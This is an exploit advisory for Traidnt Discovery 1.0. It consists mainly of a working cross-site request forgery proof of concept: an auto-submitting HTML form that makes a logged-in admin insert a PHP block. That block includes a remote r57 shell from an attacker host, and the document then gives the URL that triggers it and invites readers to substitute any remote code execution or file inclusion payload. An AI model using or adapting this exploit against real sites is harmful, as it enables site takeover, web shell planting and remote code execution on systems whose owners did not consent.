Traidnt Discovery version 1.0 suffers from php shell and cross site request forgery vulnerabilities.
0cfccdc1dfdce5b0283e029bfa7dfe575327c8e0b859211e04437e1e9a601c62
# Exploit Title: Traidnt Discovery - [CSRF] inject Blocks With PHP Codes
# Date: 11-06-2010
# Author: G0D-F4Th3r
# Software Link: http://discovery.traidnt.com/demo/
# Version: 1.0
# Tested on: http://discovery.traidnt.com/demo/
====================================[form]================================================
<html>
<form name="r00t" action="
http://site/[path]/admincp/blocks.php?do=addnew&go=insert" method="POST">
<body onload="document.forms.r00t.submit();">
<input type="hidden" name="name" value="G0D-F4Th3r"/>
<input type="hidden" name="display" value="1"/>
<input type="hidden" name="place" value="0"/>
<input type="hidden" name="php" value="1"/>
<input type="hidden" name="view" value="0"/>
<input type="hidden" name="author" value="G0D-F4Th3r"/>
<input type="hidden" name="link" value="http://site/[path]/"/>
<input type="hidden" name="code" value="{
if($_GET['ss']=="sn"){
include('http://attacker/r57.txt');
}
}"/>
</form>
</html>
====================================
After that open your code :
http://site/[path]/index.php?ss=sn
====================================
Attention:
You can change this
{
if($_GET['ss']=="sn"){
include('http://attacker/r57.txt');
}
}
to any code with Remote code execution or Local File Inclusion
It depends to what you like :)
====================================
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
Friends